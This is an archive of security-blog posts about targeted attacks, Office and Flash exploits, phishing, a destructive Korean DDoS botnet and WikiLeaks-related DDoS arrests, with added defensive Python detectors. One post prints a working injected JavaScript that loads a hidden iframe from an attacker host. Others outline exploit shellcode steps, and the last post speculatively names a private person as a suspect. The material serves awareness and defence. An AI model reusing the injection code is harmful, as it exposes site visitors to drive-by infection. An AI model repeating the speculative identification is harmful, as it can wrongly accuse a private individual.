Tag Archive | "Attacks"

Highly Targeted Attacks and the Weakest Links

Here at Trend Micro, we have seen all kinds of cybercrime and digital threats. For the first-ever Cybersecurity Awareness Day in Singapore, one of my colleagues, Richard Sheng, has taken time out to explain what so-called “Advanced Persistent Threats” (a.k.a. APT) are. Singapore is one of the first Asian countries to come up with a strong cybersecurity agenda. As such, advanced persistent threats have captured the interest of its security practitioners.

How Advanced Persistent Threats Typically Work

The term “advanced persistent threats” perhaps helps people grasp how sophisticated the attacks are that groups intending to, and capable of, targeting a specific organization can stage. Attacks under this umbrella term usually take longer to plan and execute, and use a wider variety of tools, than typical malware attacks, which are relatively uncontrolled and do not discriminate in terms of target.

Staging attacks classified as advanced persistent threats involves detailed reconnaissance work to gather information and to identify weaknesses in a particular target’s systems and infrastructure. To do this, attackers may rely on publicly available information, including data found on the target’s website or in its social networking accounts. This gives them a better idea of who in the company they should target as their attack’s point of entry. The information they gather includes employees’ names and personal details (e.g., email addresses, social networking profiles, etc.) as well as the company’s IT policies, preferred OS, applications, software, and network structure.

Next, the attackers obtain access to their target’s system through ingenious social engineering ploys. At this point, the malware, as an attack tool, is executed. It then performs malicious payloads like information theft or denial of service (DoS) without being found out. Covering their tracks is thus very important because the attackers must stay under the radar until they get what they want (e.g., data theft, backdoor program installation). The malware they use should also have the ability to communicate with them in order to transmit information or intelligence.

Do Advanced Persistent Threats Really Depart from the Typical Attack Model?

From a security practitioner’s viewpoint, using the term “advanced persistent threats” to describe what we prefer to call “highly targeted attacks” does not help our cause to empower organizations to protect themselves against these threats.

In most cases, highly targeted attacks are indeed persistent, in that they intentionally stay undetected while successfully executing their intended payload, but they are hardly as advanced as the term “advanced persistent threats” suggests. As my colleague Paul Ferguson puts it, “Most of the targeted attacks that work are indeed persistent yet still build upon the usual weak link—the social engineering ploy where a human gets duped.” Take the following as examples:

  • Google presented its findings at a security conference last year regarding the Aurora/HYDRAQ attack, revealing that, “a Google employee received a link from a person they trusted and instantly clicked on it, sending them to a malicious website, which downloaded malware”
  • RSA revealed in a blog entry that the attackers in the breach suffered by the company sent two different phishing emails to employees, the subject heading reading “2011 Recruitment Plan”

What You Can Do to Prevent, Detect and Clean These Threats

  • User Awareness on Security Best Practices and Policies – Create memorable and effective campaigns in-house that instill proper behavior in employees with regard to security.
  • Multilayered Protection – Employ firewall, vulnerability assessment tools/devices, endpoint protection, data loss prevention solutions (since information is often the targeted asset), network scanning/management (since the attack tool needs to communicate with its owner), ideally with support.
  • Patch Management – Stay informed on news about malware that exploit vulnerabilities, keep all OSs and applications updated with the latest versions and patches.
  • Data Backup – Always back up sensitive information. Also, administrators are encouraged to use back-up and restore features or any solution that can restore any machine at any given time.
  • Malware infection remediation – Use a solid security product that performs cleanup of malware traces and system modifications.

Thanks to my colleague Edgardo Diaz, Jr. for additional inputs on the above.

Post from: TrendLabs | Malware Blog – by Trend Micro

Posted in Trendmicro

Analysis of the New Adobe Flash Attacks

When Adobe warned customers earlier this week about a newly discovered vulnerability in the Flash Player software, company officials said that there were already attacks underway against the bug. Those attacks are using malicious Flash files buried in Word documents and Microsoft’s security engineers have analyzed the exploits and found some interesting details.

This is the second serious Flash vulnerability in recent weeks that attackers have targeted through the use of malicious Office files. In a previous round of attacks, hackers were going after an earlier Flash zero day with rigged Excel files. This time, Microsoft officials said, not only is the bug different, but so is the attack. Though both attacks use malicious Office files to trick users, the details are dissimilar.

The attack reaches the user as a spam message, often with a subject line referencing the Fukushima nuclear disaster, carrying a malicious Word document as an attachment.

“Once a user opens the document, Flash Player will load the malicious file and exploitation will occur. Unlike the previous vulnerability, a bug in the ActionScript Virtual Machine version 1 is now used in the exploitation process. Another difference is that this is not a result of fuzzing clean files. We won’t disclose any detail on what triggers the vulnerability, for security reasons, obviously,” Marian Radu, Daniel Radu and Jaime Wong of the Microsoft Malware Protection Center wrote in an analysis of the Flash exploit attempts.

“In order to exploit this vulnerability the attackers packaged the AVM1 code inside an AVM2 based Flash file. The latter is embedded inside the Word document and assigned with setting up the exploitation environment. Initially the AVM2 code constructs a heap-spray buffer made of a NOP-sled.”

The next step is the construction of the shellcode, which in turn then loads the Flash exploit code inside the Flash Player.

“The AVM1 code that triggers this vulnerability is loaded as a separate SWF file, converted from a hex-encoded embedded string and executed,” the researchers said.

The shellcode performs some other tasks, as well, including installing a benign Word document on the compromised machine as a way of hiding the original malicious file.
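The packaging the researchers describe (an embedded SWF whose body carries a second, hex-encoded SWF) can be recognised statically. The following Python scanner is an added example, not code from the Microsoft analysis or the original post; the SWF header layout is public, while the version sanity bound and the sample document are constructed for this example.

```python
import re
import struct
import zlib

# SWF files start with "FWS" (uncompressed) or "CWS" (zlib-compressed body),
# followed by a one-byte version and a little-endian uncompressed length.
SWF_SIG = re.compile(rb"[FC]WS")
# The same 8-byte header written as a hex string, as the post describes for the
# embedded AVM1 file: 6 hex chars of signature, 2 of version, 8 of length.
HEX_SWF = re.compile(rb"(?:465753|435753)[0-9a-f]{10}", re.IGNORECASE)
MAX_VERSION = 30  # assumed sanity bound; Flash Player 10-era SWFs are version <= 10


def parse_swf_header(buf, off):
    """Return (sig, version, length) if a plausible SWF header sits at off, else None."""
    if off + 8 > len(buf):
        return None
    sig = buf[off:off + 3].decode("ascii")
    version = buf[off + 3]
    length = struct.unpack_from("<I", buf, off + 4)[0]
    if not 1 <= version <= MAX_VERSION or length < 8:
        return None
    return sig, version, length


def swf_body(buf, off, sig):
    """Return the SWF body after the header, inflating it for CWS files."""
    data = buf[off + 8:]
    if sig == "FWS":
        return data
    try:
        # decompressobj tolerates trailing bytes after the zlib stream
        return zlib.decompressobj().decompress(data)
    except zlib.error:
        return b""


def nested_swfs(body):
    """Find raw or hex-encoded SWF headers inside a (decompressed) SWF body."""
    found = []
    for m in SWF_SIG.finditer(body):
        hdr = parse_swf_header(body, m.start())
        if hdr:
            found.append({"encoding": "raw", "offset": m.start(), "version": hdr[1]})
    for m in HEX_SWF.finditer(body):
        hdr = parse_swf_header(bytes.fromhex(m.group().decode("ascii")), 0)
        if hdr:
            found.append({"encoding": "hex", "offset": m.start(), "version": hdr[1]})
    return found


def find_swfs(document):
    """Scan a document blob for embedded SWFs and for SWFs nested inside them.

    SWF version 8 or lower predates ActionScript 3, so a nested file with such a
    version can only carry AVM1 code, matching the structure the post describes.
    """
    findings = []
    for m in SWF_SIG.finditer(document):
        hdr = parse_swf_header(document, m.start())
        if hdr is None:
            continue
        sig, version, length = hdr
        nested = nested_swfs(swf_body(document, m.start(), sig))
        for n in nested:
            n["avm1_only"] = n["version"] <= 8
        findings.append({"offset": m.start(), "sig": sig, "version": version,
                         "declared_length": length, "nested": nested})
    return findings


def build_sample_document():
    """Constructed sample: a fake document blob carrying a CWS whose body holds a hex-encoded FWS."""
    inner = b"FWS" + bytes([6]) + struct.pack("<I", 30) + b"\x00" * 22
    body = b"\x78\x00\x05\x5f" + b'var s = "' + inner.hex().encode() + b'";' + b"\x00" * 16
    outer = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)
    return b"\xd0\xcf\x11\xe0" + b"A" * 64 + outer + b"B" * 32


if __name__ == "__main__":
    for finding in find_swfs(build_sample_document()):
        print(finding)
```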

This attack method is essentially the one that the attackers used to compromise RSA last month and steal some data related to the company’s SecurID product line.

Posted in Kaspersky

alisa-carter.com, lizamoon.com and worid-of-books.com

The injection attacks from lizamoon.com and other domains continue, and they link back to a popular blog post about a very different attack site at worid-of-books.com because, at the moment, all these sites appear to be on the same server at 95.64.9.18, belonging to Intermedia TOP SRL.

The following sites are on that malicious server:
alexblane.com
alisa-carter.com
lizamoon.com
t6ryt56.info
tadygus.com
worid-of-books.com

Right now the safest thing to do is block traffic to 95.64.8.0/23 (95.64.8.0 – 95.64.9.255) at the very least. But given that there are several bad networks now within the mostly Romanian 95.64.0.0/16, there’s very little to lose in blocking the whole /16 for now if you don’t have dealings with Romania.

If you need to block by domain, then the list below is everything that I can identify in this block.

Posted in Security

How Sophisticated are Targeted Malware Attacks?

Malware attacks that exploit vulnerabilities in popular software in order to compromise specific target sets are becoming increasingly commonplace. Prior to the highly publicized “Aurora” attack on Google and at least twenty other companies, targeted malware attacks had been taking place and they continue to affect government, military, corporate, educational and civil society networks. While such attacks against the US government and related networks are well known, other governments and an increasing number of companies are facing similar threats.

Earlier this year, the Canadian, South Korean and French governments all suffered serious breaches of sensitive networks. Recently, the European Commission and the External Action Service were also compromised. There have also been acknowledged security breaches at the security firms RSA and Comodo which—at least in the case of RSA—appear to be the result of targeted malware attacks.

Technically sophisticated or simply well-executed?

Such attacks are almost always described as sophisticated or targeted, adjectives which have basically become synonymous with successful. The statements issued after breaches often suggest that attackers knew exactly what to exploit and, in some cases, exactly what they were looking for. It is difficult to assess such claims based solely on the murky details that emerge publicly. Therefore I am not suggesting that such characterizations are necessarily incorrect. Rather, I am suggesting that the level of targeting and sophistication are results of prior knowledge gained by the attackers and not necessarily caused by some technical brilliance in the tools and methods used.

While most Internet users will never be victims of targeted attacks and are more likely to face common threats such as fake security software (FAKEAV) and banking Trojans (Zeus, SpyEye), there continues to be a steady stream of malware samples that are linked to targeted attacks. However, the actual level of targeting varies considerably. There are some malicious actors that generate more “noise” than others. While they do send out malicious documents, often leveraging specific themes and issues for social engineering, they are received by a relatively large number of potential targets. They are certainly not targeted to the level of an individual or even an organization. However, such attacks may simply be the precursor to much more specific, targeted attacks.

Laying the groundwork

A recent sample, which I received via contagiodump.blogspot.com, illustrates the level of reconnaissance that “noisy” attackers can generate. The malware sample was a .CHM file that exploits Microsoft HTML Help. The malware, which is detected by Trend Micro as CHM_CODEBASE.AG, drops BKDR_SALITY.A and proceeds to generate network traffic with well-known BKDR_SALITY.A servers.

However, the malware made another set of network connections to win{BLOCKED}.dyndns.info. The Web page accessed on this server contains JavaScript code that uses the res:// protocol to enumerate the specific software on the compromised computer and submits the listing to win{BLOCKED}.dyndns.info. This method of using the res:// protocol to enumerate installed software was documented by Billy Rios in 2007. Rios explains that the res:// protocol, which was built into Internet Explorer since version 4.0, can be used to remotely detect specific software present on a computer by simply getting a user to visit a Web page from a browser. As Rios notes, this technique can be used to identify specific applications in order to select an appropriate exploit. It can also be used to detect the presence of specific drives. Years later, this technique is still effective.

The script at win{BLOCKED}.dyndns.info detects an extensive list of software:

  • Microsoft Office (Word and Outlook) from Windows 97 through to 2010
  • Adobe Reader (7.0 to 9.3)
  • Adobe Flash
  • Java
  • Instant messaging programs (Skype, Yahoo! Messenger, MSN, Google Talk, and QQ)
  • Programming and graphics tools (Delphi, .net, Photoshop and Dreamweaver)

It also checks for file sharing programs, Web browsers, remote administration tools, email clients, download managers and media players. Security software is also detected, including major antivirus products and personal firewalls, as well as the PGP encryption software. In addition, it checks for virtual machine software and tries to detect whether it is running within VMware. Finally, it checks for Microsoft updates from KB842773 through to KB981793.
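The profiling described above leaves a recognisable footprint in the served page. The following Python is an added example, not the script from win{BLOCKED}.dyndns.info: it extracts the res:// targets a page references and flags pages that probe many binaries, or the same binary across several install directories (the version enumeration the post describes). The sample pages, the file names in them and the thresholds are constructed for this example.

```python
import re
from collections import defaultdict

# A res:// URI names a file, usually by full path, followed by a resource type
# and id, e.g. res://C:\Program Files\Vendor\app.dll/#2/#1. Capture everything up
# to the closing quote or tag delimiter.
RES_URI = re.compile(r"res://([^'\"<>\r\n]+)", re.IGNORECASE)


def extract_res_probes(content):
    """Map each file name referenced via res:// to the set of directories probed."""
    probes = defaultdict(set)
    for m in RES_URI.finditer(content):
        # the file part ends at the first forward slash; the resource id follows it
        file_part = m.group(1).split("/")[0]
        # JS string literals double their backslashes; collapse them before splitting
        parts = [p for p in file_part.replace("\\\\", "\\").split("\\") if p]
        if not parts:
            continue
        name = parts[-1].lower()
        directory = "\\".join(parts[:-1]).lower()
        probes[name].add(directory)
    return dict(probes)


def assess_page(content, binary_threshold=5, version_threshold=3):
    """Heuristic: flag pages probing many binaries, or one binary across many install paths."""
    probes = extract_res_probes(content)
    versioned = {name: sorted(dirs) for name, dirs in probes.items()
                 if len(dirs) >= version_threshold}
    return {
        "distinct_binaries": len(probes),
        "version_probes": versioned,
        "suspicious": len(probes) >= binary_threshold or bool(versioned),
    }


# Constructed sample pages (assumed content, not the real profiling script).
FINGERPRINT_PAGE = r"""<html><body><script>
var targets = [
  "res://C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE/#2/#1",
  "res://C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE/#2/#1",
  "res://C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\AcroRd32.dll/#2/#1",
  "res://C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/#2/#1",
  "res://C:\\Program Files\\Adobe\\Reader 9.3\\Reader\\AcroRd32.dll/#2/#1",
  "res://C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe/#2/#1",
  "res://C:\\Program Files\\Java\\jre6\\bin\\java.exe/#2/#1",
  "res://C:\\Program Files\\Skype\\Phone\\Skype.exe/#2/#1"
];
</script></body></html>"""

BENIGN_PAGE = """<html><body>
<img src="res://ieframe.dll/info.gif" alt="constructed: a single local resource reference">
</body></html>"""


if __name__ == "__main__":
    print(assess_page(FINGERPRINT_PAGE))
    print(assess_page(BENIGN_PAGE))
```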

This malware sample is admittedly odd because it conducts these checks after the user’s computer is already compromised. If this were being used for profiling, wouldn’t it have been done before the attack? One possible explanation is that the attackers are deliberately sending out “noisy” attacks with the hopes that administrators would simply clean compromised systems and move on. However, by then the attackers would have a profile of the machines in an organization that was compromised. They will know the preferred antivirus products, the specific versions of installed software and other information they can use to stage a targeted attack in the future. When the attackers are ready, they will stage an attack aimed at acquiring specific data. The attackers will know exactly what versions of what software to exploit in order to compromise the target. The attack will be characterized as sophisticated and targeted because prior information about the organization has helped make the attack successful.

Post from: TrendLabs | Malware Blog – by Trend Micro

Posted in Trendmicro

Malware in Recent Korean DDoS Attacks Destroys Systems

There has been quite a bit of news recently about distributed denial of service (DDoS) attacks against a number of South Korean websites. About 40 sites, including the Presidential, National Intelligence Service, Foreign Ministry, Defense Ministry, and National Assembly sites, were targeted over the weekend, beginning around March 4 at 10 a.m. Korean time. These assaults resemble those launched in 2009 against sites in South Korea and the United States, although there is no direct evidence connecting them so far.

DDoS attacks have occurred with more and more frequency, but one of the things that makes this attack stand out is its use of destructive payloads. Our analysis of the code used in the attack shows that when a specific timezone is noted by the malware it destroys the infected computer’s master boot record. If you want to destroy all the data on a computer and potentially render it unusable, that is how you would do it.

The malware in the Korean attacks employs an unusual command and control (C&C) structure. Instead of receiving commands directly from its C&C servers, the malware contacts two layers of servers. The first layer of C&C servers is encoded in a configuration file that can be updated at will by the botnet owner. These C&C servers simply provide a list of servers in the second layer, which provide additional instructions. Looking at the distribution of the first-layer C&Cs gives us valuable insight into the malware’s global footprint. Distribution across this many countries increases resilience to takedowns.

This is further supported because the list of first-layer servers can be updated at any time.

The red code blocks deal with contacting the first-layer C&C server, the green code blocks retrieve the list of the second-layer servers, and the blue code blocks handle file downloads from the second-layer servers.

Botnets of infected computers usually receive commands directly and carry out the nefarious intent of their controllers. In this case, however, the C&C application behaves more like a downloader. Instead of directly interpreting commands, the application simply downloads files to the local hard disk. Secondary malware components that run independently of the main service find these files and then evaluate their contents to carry out an attack.

The two layers make it harder to analyze the malware because an analyst must understand many components and cannot simply follow the code flow within one malware binary. However, forensics are easier because in postmortem we can identify which task files have been created on an infected computer.

The malware in its current incarnation was deployed with two major payloads:

  • DDoS against chosen servers
  • Self-destruction of the infected computer

Although the DDoS payload has already been reported elsewhere, the self-destruction we discussed earlier in this post is the more pressing issue.

When installed on a new computer, the malware records the current time stamp in the file noise03.dat, which contains the number of days this computer is given to live. When this time is exceeded, the malware will:

  • Overwrite the first sectors of all physical drives with zeroes
  • Enumerate all files on hard disk drives and then overwrite files with specific extensions with zeroes

The service checks for task files that can increase the time this computer is allowed to live, so the botmaster can keep the botnet alive as long as needed. However, the number of days is limited to 10. Thus any infected computer will be rendered unbootable and data will be destroyed at most 10 days after infection! To protect against tampering, the malware will also destroy all data when the system time is set before the infection date.

The list of file extensions that will be overwritten is particularly interesting. It contains typical document data:

  • doc, docx, docm
  • xls, xlsx
  • pdf, eml (Outlook Email)

The list also contains some programming-language file extensions, such as c, cpp, h, and java. Wonder what they thought would be on the infected machines? Or did they already know?

One thing is clear: This is a serious piece of malware. It uses resilience techniques to avoid a takedown and even has destructive capabilities in its payload. This year is quickly shaping up to be a period of serious attacks and escalations on the cyberfrontier.

Posted in McAfee

Massive Phishing Attacks Strike Bank of China Users

We have noticed a lot of SMS-based web-phishing attacks in China targeting the Bank of China’s online users. Customers receive a phishing SMS designed to look like it was sent by the bank as a reminder: “Dear user, your token has expired, please visit http://www.boc**.com to reactivate your token.” The URL is similar to the bank’s official website but points to a phishing site that looks almost identical to the original bank website.

On this bogus phishing website, there is a button on the top right that says “Upgrade your token.”

Once the user clicks this button, it redirects to a page that looks like the normal online-banking login page. The criminals will get all the info they need to steal money from the victim’s account: user ID, password, and token.

This information is used immediately to transfer the victim’s money into the attacker’s account before the token expires.

Many technologies, including tokens, certificates and dongles, are designed specifically to protect against phishing. But even though Bank of China uses tokens to enhance security, customers still need to take care to prevent this type of phishing attack.

Posted in McAfee

Night Dragon attacks: myth or reality?

Many readers will have seen the press around a series of attacks that have been labelled the ‘Operation Night Dragon’ attacks by McAfee. In this post I will attempt to answer some of the more common questions we have been receiving from customers on this topic.

What is the Night Dragon attack?
To date, there has not been a specific family of malware known as ‘Night Dragon’. Instead, the term has been used to label a series of attacks against various organisations since November 2009, all of which have followed a similar modus operandi. In the McAfee report, the attacks were described as targeted, using techniques such as social engineering and spear phishing. The purpose of the attacks appears to be penetration of corporate networks in order to extract sensitive data.

How do these attacks work?
The attacks use a variety of components – there is no single piece or family of malware responsible.

The first stage of the attack involves penetration of the target network, ‘breaking down the front door’ if you like. Techniques such as spear phishing and SQL injection of public-facing web servers are reported to have been used. Once in, the attackers then upload freely available hacker tools onto the compromised servers in order to gain visibility into the internal network. The internal network can then be penetrated by typical penetration methods (accessing Active Directory account details, cracking user passwords, etc.) in order to infect machines on the network with remote administration tools (RATs).

Am I protected against these attacks?
There are several components used in these attacks, many of which are available from Chinese hacker web sites. As such, there are various detection names associated with this threat. From the details shared thus far around the binaries believed to be involved in these attacks, most of the core components are detected by Sophos products as Mal/Generic-L.

For clarity, we have since published the Troj/NDragon-A and Mal/NDragon-A detections to group the various components together, the latter genotype detection providing generic detection for other variants that are likely to be in the wild.

Detection for some other components used in the attacks has been added as Troj/Redsip-A and Mal/Redsip-A.

The available details suggest that in addition to the above malware, various legitimate tools were used in the attacks (e.g. SysInternals tools). Sophos customers are able to use potentially unwanted application (PUA) and application control (AppC) detections to fully manage the use of such tools within their environment. These tools can include software that is legitimate, but that you really do not want to allow to run on your network (for example, IP scanning, password recovery and remote administration tools).

The one thing clear from the Night Dragon attacks is that the use of PUA and AppC detections should not be dismissed. Using these types of technology to help manage what is allowed to run on your network can clearly provide a real security benefit.

Are these attacks targeted?
Again, at this point, we can only speculate based on the information provided in the report. It could well be that the attacks are targeted against specific organisations. Equally, could it be the case that widespread networks have been hit in a similar fashion? That the high profile organisations listed are just the ones where the attack has actually been detected and reported? After all, we are more than familiar with SQL injection techniques being used in an automated fashion to compromise large numbers of web servers.

Why is it important if the attacks were targeted or not? In my opinion, it is a matter of perception. It is important that we do not regard this type of attack as likely to only ever be targeted against high profile, large organisations. All organisations should learn from this report and ensure they have adequate layered protection across their network. User education is important as well – to avoid social engineering providing the route through the front door.

Is this related to Operation Aurora?
I am sure some will speculate that it is! (Just don’t mention the S*****t word!) The truth is, without further information about the source of the attacks it is impossible to tell whether the Night Dragon attacks are related to Aurora at all. The style of attack may be similar (breach the perimeter using whatever means necessary, and then penetrate the internal network to find and extract the required data), but we cannot read too much into what is a very standard form of attack.

Concluding comments
The bottom line from this report is that all organisations must take note of the risk that today’s cybercriminals can pose. The report reflects not so much a single piece of sophistication, in either attack methodology or malware. Instead it emphasizes the persistent and coordinated attacks of organised groups against specific organisations, with the goal of extracting sensitive data.

The truth is that this week is no different to last – there is no new outbreak, vulnerability or risk of infection. Instead, the attacks illustrate the background crimeware menace that all organisations face.

Posted in Sophos

How the Scarcity Principle is Used in Online Scams and Attacks

The scarcity principle, popularized in Robert Cialdini’s book Influence: Science and Practice, dictates that people assign more value to opportunities that are less available. Scammers take advantage of this psychological tendency when social engineering victims on-line.

Time Limitation

A classic illustration of the scarcity principle used for persuasion is the situation where the offer has an expiration date. You’ve probably seen this in action at a local store, where signs exclaimed “Hurry! Sale ends Saturday!”

How do scammers replicate this scenario online? In an earlier post I described a “Home Income Kit” scam, which attempted to persuade victims to pay for a kit that would allow them to make thousands of dollars per month without much effort. The scam used numerous social-engineering techniques. One of them was the scarcity principle in this form:

The scarcity principle suggested that people were more likely to purchase the kit before the (bogus) promotion offer was about to expire.

Another illustration of the time limitation igniting the sense of urgency among victims is the scam that directed people to a fraudulent website under the guise that Facebook will be disabling unconfirmed accounts today. (This scam was reported by Graham Cluley.)

Obstacle Restriction

Building upon the scarcity principle, Cialdini described research showing that “the act of limiting access to a message causes individuals to want to receive it more.” In other words, the forbidden fruit tastes sweeter.

I noticed this principle being used as part of an on-line scam that Jerome Segura described, discussing a link to a malicious executable that was sent via email. When the victims clicked the link, they were made to wait a minute:

After that, they had to solve a CAPTCHA challenge before finally being allowed to obtain the file. The more obstacles the victim had to bypass, the more he or she wanted the file:

Similar use of the scarcity principle occurs when victims are told that they need to install a missing plug-in or update Flash Player to see the desired content. Not being able to get the content immediately makes people want it even more. Unfortunately, they end up installing a trojan horse in the process.

We can consider the scarcity principle playing a role in the success of phishing scams, which present the victim with a logon screen before the person can access the needed data. The human brain will see the logon screen as an obstacle that’s restricting access to the desired item, and will motivate the person to provide the username and password to bypass the restriction.

Why the Scarcity Principle Works

According to Cialdini, one of the reasons the scarcity principle works is because “things that are difficult to attain are typically more valuable.” As a result, humans use the availability of an item as a heuristic for assessing its quality. Second, “as things become less accessible, we lose freedoms. According to psychological reactance theory, we respond to the loss of freedoms by wanting to have them.”

Now that you know about the scarcity principle, be wary of situations where someone is trying to use it to persuade you to take an action. Also, consider discussing this tendency and the examples of relevant scams as part of your security awareness training.

If you found this post interesting, take a look at my other writing on social engineering, including Faux-Targeted Attacks and the Magic of Cold Reading.

Lenny Zeltser

Posted in Security

Phishing Attacks Target Twitter Users

A new attack on Twitter users has been arriving as spam with a phishing link. It appears as a notification about an unread message from Twitter Support with a subject line such as “Twit 73-923.” The ending number can vary. The body of the message includes “You have [some number of] delayed message(s) from Twitter” and a link to a phishing site.

If you receive one of these emails, make sure to check where the link points before clicking on it. To visit a page such as this (or any page, for that matter), it’s much safer to manually type the web address instead of clicking a link in an email. Links can easily be faked!

Users without protection who click on any of these links could infect their PCs or reveal their Twitter credentials.

We recommend you take advantage of either or both of McAfee’s TrustedSource™ reputation system and SiteAdvisor Technology to protect yourself against malicious phishing attacks and the sites that host them.

Tweet, search and surf safely out there!

View full post on McAfee Avert Labs

Posted in Antivirus

Phone Scams and Panic Attacks

Here's a somewhat novel social engineering attack, flagged by John Leyden in The Register: a voicemail phishing scam (vishing, if you must) that threatens victims with heavy fines and even imprisonment as a result of their visiting the Wikileaks site. The attacker leaves a message including a number victims are supposed to ring to sort … Read More.

Full story: ESET ThreatBlog

Why do phishing attacks work better on mobile phones?

During my regular reading of the main information security feeds this week, I found a small but particular news item that, I think, invites us to think about it. It turns out that according to a post by Mickey Boodaei, CEO of Trusteer, mobile phone users are three times more likely to become victims of … Read More.

Full story: ESET ThreatBlog

Microsoft turns to creative tactic to block IE attacks

Microsoft today turned to a new defensive measure to help users ward off ongoing attacks exploiting a known bug in IE.

Full story: Computerworld Security News

Virus attacks Android phones in China: researchers (Reuters)

Reuters – A powerful virus targeting smart phones in China running Google Inc’s Android operating system may represent the most sophisticated bug to target mobile devices to date, security researchers said on Thursday.

Full story: Yahoo! News: Security News

Targeted Attacks on MS Word Use Recently-Patched Flaw

Microsoft’s Malware Protection Center has observed malware in the wild which exploits a recently patched vulnerability in Microsoft Office. This vulnerability is especially dangerous because, in some configurations, it can be exploited just by reading an e-mail.

The malware comes in the form of a specially crafted RTF file which exploits CVE-2010-3333, one of the vulnerabilities patched in MS10-087, part of the November Patch Tuesday. CVE-2010-3333 is an RTF Stack Buffer Overflow Vulnerability. RTF data is handled by Microsoft Word, and Outlook users can set Word to be their e-mail reader in Outlook. In such a configuration, a malicious e-mail containing RTF data which exploits the vulnerability can trigger it simply by being read.

The vulnerability can also be triggered by attaching a malicious RTF file to an e-mail and convincing the user to download and open the RTF file. The Microsoft description of this attack, which they designate Exploit:Win32/CVE-2010-3333, implies that it uses a separate file, but is not completely clear on the matter.

The description goes into great detail about how the exploit triggers and executes shellcode, but the user experience of the attack is not mentioned. Thus there is nothing specific to look for.

The best advice for users to avoid this attack is to make sure you have successfully installed MS10-087. It’s reasonable to expect that anti-malware products, such as Microsoft’s, contain or will soon contain definitions for specific instances of this attack.

Full story: Security Watch

Targeted attacks against recently addressed Microsoft Office vulnerability (CVE-2010-3333/MS10-087)

Last November, Microsoft released security bulletin MS10-087, which addresses a number of critical vulnerabilities in how Microsoft Office parses various office file formats. One of them is CVE-2010-3333, “RTF Stack Buffer Overflow Vulnerability,” which could lead to remote code execution via specially crafted RTF data. A few days before Christmas, we received a new sample (sha1: cc47a73118c51b0d32fd88d48863afb1af7b2578) that reliably exploits this vulnerability and is able to execute malicious shellcode which downloads other malware.

The vulnerability can be triggered by a specially crafted RTF file with a size parameter larger than the expected one. The vulnerable code is in Microsoft Word: it attempts to copy RTF data to stack memory without validating the size, which overwrites the stack.


Figure 1.10: the copy code that overwrites the stack (image not reproduced)

After executing the code in figure 1.10, the stack memory is overwritten by the first part of the shellcode. The challenge for the exploit writer is to make sure the shellcode gains control and is executed. In this sample, one of the return addresses was overwritten with an address that can be found in any known DLL loaded in memory. That address holds a single instruction, “Jmp ESP”, which transfers control to the stack memory containing the first shellcode.

Let’s take a look at the first shellcode: 


Figure 1.20: the first-stage shellcode (image not reproduced)

The code above uses a brute-force method to find the second shellcode’s entry point by searching for the string “pingping” starting from the hardcoded address 0x500000. To avoid causing exceptions while scanning these memory pages, it checks whether each page is accessible by calling NtAccessCheckAndAuditAlarm() via Int 2Eh, passing EAX = 2h (the NtAccessCheckAndAuditAlarm system call ordinal) and the page address in EDX. The call returns STATUS_ACCESS_VIOLATION in EAX if the page is not accessible.

The second shellcode starts by decrypting the rest of its code and strings with an XOR operation using constant keys. It then retrieves the addresses of the APIs it needs, downloads the malware from a remote location, and executes it. In our sample, it attempts to download a file named svchost.exe and saves it as <system folder>\a.exe (detected as Trojan:Win32/Turkojan.C).

Microsoft detects this exploit as Exploit:Win32/CVE-2010-3333.

We recommend that customers who have not yet installed security update MS10-087 do so at their earliest convenience.

For reference, here’s a list of some SHA1s we’ve seen related to these targeted attacks:

  • 00d9af54c5465c28b8c7a917c9a1b1c797b284ab
  • 24ee459425020ea61a10080f867529ea241c51dc
  • 2e6abd663337c76379ae26b8aa6cf4db98137b64
  • 77637eccf9011d420cccc520bcb3ed0cf907dc00
  • CC47A73118C51B0D32FD88D48863AFB1AF7B2578

– Rodel Finones

Full story: Microsoft Malware Protection Center

Geographical targeting of attacks

Attackers have often targeted specific geographical regions, or,
conversely, spared certain regions from their attacks. A recent example
is the following JavaScript found on a malicious web page:

var s, siteUrl, tmpdomain;
// Domain suffixes the attacker spares: visitors from these hosts get no payload.
var arydomain = new Array(".gov.cn",".edu.cn");
// Take the host part of the current URL (the substring after the 7 characters of "http://").
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
    // Flag the visit if the host contains any spared suffix.
    if(siteUrl.indexOf(arydomain[i]) > -1){
        tmpdomain = 1;
        break;
    }
}
// Everyone else gets a zero-height iframe that loads the attacker's page.
if(tmpdomain == 0) {
    document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}

The code checks the location of the current document. If the domain
does not contain the strings .gov.cn or .edu.cn, then the attack is
launched (by dynamically creating an iframe tag), otherwise the script
performs no action.

Certainly not new, but still interesting…

– on Marco’s Blog

Hacker group defends attacks on WikiLeaks foes

The loosely-knit Anonymous hacker group Friday called its attacks against perceived foes of WikiLeaks a symbolic protest. – on Computerworld Security News

Second Dutch teenager arrested for WikiLeaks-related DDoS attacks

Police in the Netherlands have arrested a second teenager in relation to the pro-WikiLeaks distributed denial-of-service attacks seen earlier this week.

The arrest of the 19-year-old man follows Friday’s attacks on websites belonging to Dutch Police and national prosecutor’s office, which were themselves widely seen as retaliation against the apprehension the day before of a 16-year-old Dutch boy alleged to have participated in “Anonymous” pro-WikiLeaks attacks against a number of websites, including MasterCard and PayPal.

Prosecutors claim that the 19-year-old, from Hoogezand-Sappemeer, in the north east of the Netherlands, flooded the prosecutor’s website with internet traffic:

"From behind his computer, the man used hacker software to flood the website of the prosecutor’s office with as much digital traffic as possible. Investigations by the National Police Services Agency showed that the man, who was active under the internet nickname Awinee, urged other internet users to participate in the attack."

However, it is reported that the DDoS attack software being used did not hide the IP address of the computer involved, making it easy for high-tech crime cops to identify where the attack was coming from.

That’s a pretty silly mistake to make if you’re going to attack the website of your country’s national prosecutor.

Who is “Awinee”? Well, a quick search on Google found a gaming website of a guy who lives in Hoogezand-Sappemeer, is 19 years old, and uses the online nickname “Awinee”, going by the real name of Martijn Gonlag.

Of course, that may just be coincidence. Wikipedia says 34,000 people live in the Hoogezand-Sappemeer municipality, and maybe plenty of the 19-year-olds there use that online nickname.

